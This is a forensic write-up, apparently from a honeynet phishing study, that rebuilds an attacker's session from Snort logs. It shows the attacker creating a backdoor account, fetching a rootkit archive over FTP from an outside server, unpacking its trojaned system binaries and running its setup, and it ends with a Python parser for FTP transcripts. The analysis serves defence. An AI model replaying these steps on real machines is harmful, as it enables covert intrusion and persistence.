Analysis of German attacker's sessions

This side note shows the commands issued by the phisher from the attacker's perspective. The attacker's actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rootkit was installed, which were again reconstructed with the help of the Snort log files.

Screenshot of the rootkit installation:

[image:../../images/rootkit_screenshot.png size=full]

Commands issued by the attacker:

  /usr/sbin/adduser ro
  passwd ro
  0030934040877
  0030934040877
  Changing password for user ro
  passwd: all authentication tokens updated successfully
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  choose
  Name (204.92.xxx.xxx:root): 331 User choose okay, need password.
  a
  530 Login incorrect.
  bye
  Remote system type is UNIX.
  Using binary mode to transfer files.
  221 Goodbye.
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  example
  Name (204.92.xxx.xxx:root): 331 User example okay, need password.
  choose
  230-You are user #14 of 350 simultaneous users allowed.
  230-
  230 Restricted user logged in.
  hash
  pass
  deb
  bin
  Remote system type is UNIX.
  Using binary mode to transfer files.
  Hash mark printing on (1024 bytes/hash mark).
  Passive mode off.
  Debugging on (debug=1).
  ---> TYPE I
  200 Type okay.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  ls
  250 "/cgi-bin/rootkyt" is new cwd.
  ---> TYPE A
  200 Type okay.
  ---> PORT 212,44,161,115,9,136
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt
  -rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/cgi-bin" is new cwd.
  ls
  ---> PORT 212,44,161,115,9,137
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz
  -rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip
  -rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz
  -rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz
  -rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz
  -rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website
  -rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz
  -rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz
  -rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php
  -rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt
  -rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz
  -rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz
  -rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz
  -rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz
  -rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz
  -rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz
  -rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip
  226 Listing completed.
  cd ..
  ---> CWD ..
  ls
  250 "/" is new cwd.
  ---> PORT 212,44,161,115,9,138
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin
  drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www
  226 Listing completed.
  cd www
  ---> CWD www
  ls
  250 "/www" is new cwd.
  ---> PORT 212,44,161,115,9,139
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz
  -rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm
  -rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz
  -rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie
  -rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz
  -rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz
  -rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz
  -rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz
  -rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/" is new cwd.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  250 "/cgi-bin/rootkyt" is new cwd.
  get superwu.tgz
  local: superwu.tgz remote: superwu.tgz
  ---> TYPE I
  200 Type okay.
  ---> PORT 212,44,161,115,9,140
  200 PORT command successful.
  ---> RETR superwu.tgz
  150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
  ##################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
  226 Transfer completed.
  bye
  723128 bytes received in 96.7 secs (7.3 Kbytes/sec)
  ---> QUIT
  221 Goodbye.
  tar xzvf superwu.tgz
  .nr/
  .nr/createdir
  .nr/firewall
  .nr/status
  .nr/clean
  .nr/mailme
  .nr/patch
  .nr/remove
  .nr/replace
  .nr/startfile
  .nr/init
  .nr/sendmail/
  .nr/sendmail/sshd_config
  .nr/sendmail/ssh_host_key
  .nr/sendmail/ssh_random_seed
  .nr/sendmail/sendmail
  .nr/chattr
  .nr/dir
  .nr/du
  .nr/encrypt
  .nr/fix
  .nr/ifconfig
  .nr/killall
  .nr/libproc.so.2.0.6
  .nr/login
  .nr/ls
  .nr/lsof
  .nr/md5sum
  .nr/netstat
  .nr/ps
  .nr/pstree
  .nr/socklist/
  .nr/socklist/Xf/
  .nr/socklist/Xf/fix.c
  .nr/socklist/Xf/fix
  .nr/socklist/Xf/chattr
  .nr/socklist/Xf/socklistx.c
  .nr/socklist/Xf/socklistx
  .nr/socklist/Xf/move
  .nr/socklist/Xf/stringsx.c
  .nr/socklist/Xf/stringsx
  .nr/socklist/socklist
  .nr/socklist/utils/
  .nr/socklist/utils/.siz.c
  .nr/socklist/utils/siz
  .nr/top
  .nr/vdir
  .nr/lg
  .nr/.c
  .nr/.d
  .nr/.p
  .nr/write
  .nr/read
  .nr/cl
  .nr/curatare/
  .nr/curatare/ps
  .nr/curatare/pstree
  .nr/curatare/sshd
  .nr/curatare/clean
  .nr/curatare/chattr
  .nr/curatare/attrib
  setup
  ./setup
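The reconstruction above was done by hand from the captured FTP control channel. As an added example (not part of the original write-up or the Snort data), the following parser pulls the same facts out of such a transcript automatically: login attempts and their outcome, directory changes, the client data endpoint announced by PORT, and every RETR with its size and completion status. The embedded session is a constructed excerpt modelled on the one above.

```python
import re
# Constructed excerpt modelled on the FTP session above; not the raw Snort log.
SAMPLE_SESSION = """\
Name (204.92.xxx.xxx:root): 331 User choose okay, need password.
530 Login incorrect.
Name (204.92.xxx.xxx:root): 331 User example okay, need password.
230 Restricted user logged in.
---> CWD cgi-bin
250 "/cgi-bin" is new cwd.
---> CWD rootkyt
250 "/cgi-bin/rootkyt" is new cwd.
---> PORT 212,44,161,115,9,140
---> RETR superwu.tgz
150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
226 Transfer completed.
"""
RE_USER = re.compile(r"331 User (\S+) okay")
RE_CWD = re.compile(r'250 "([^"]+)" is new cwd')
RE_PORT = re.compile(r"---> PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")
RE_RETR = re.compile(r"---> RETR (\S+)")
RE_SIZE = re.compile(r"data connection for \S+ \((\d+) bytes\)")


def parse_ftp_session(text):
    """Collect logins (user, success), directory changes and RETR transfers
    (file, cwd, data-channel endpoint, size, completed) from a transcript."""
    logins, cwds, transfers = [], [], []
    pending_user = data_endpoint = cur = None
    for line in text.splitlines():
        if m := RE_USER.search(line):
            pending_user = m.group(1)  # server accepted the name, wants a password
        elif line.startswith(("230", "530")) and pending_user:
            logins.append((pending_user, line.startswith("230")))
            pending_user = None
        elif m := RE_CWD.search(line):
            cwds.append(m.group(1))
        elif m := RE_PORT.search(line):
            a, b, c, d, hi, lo = (int(x) for x in m.groups())
            # PORT h1,h2,h3,h4,p1,p2: the client's IP and port p1*256 + p2
            data_endpoint = (f"{a}.{b}.{c}.{d}", hi * 256 + lo)
        elif m := RE_RETR.search(line):
            cur = {"file": m.group(1), "cwd": cwds[-1] if cwds else "/",
                   "endpoint": data_endpoint, "bytes": None, "done": False}
            transfers.append(cur)
        elif cur and (m := RE_SIZE.search(line)):
            cur["bytes"] = int(m.group(1))
        elif cur and line.startswith("226"):
            cur["done"] = True
            cur = None
    return {"logins": logins, "cwds": cwds, "transfers": transfers}
```

Run over the full session, the transfers list gives the analyst the archive name, the directory it was fetched from, and the compromised host's PORT endpoint, which can then be matched against the corresponding data-channel flow in the Snort capture.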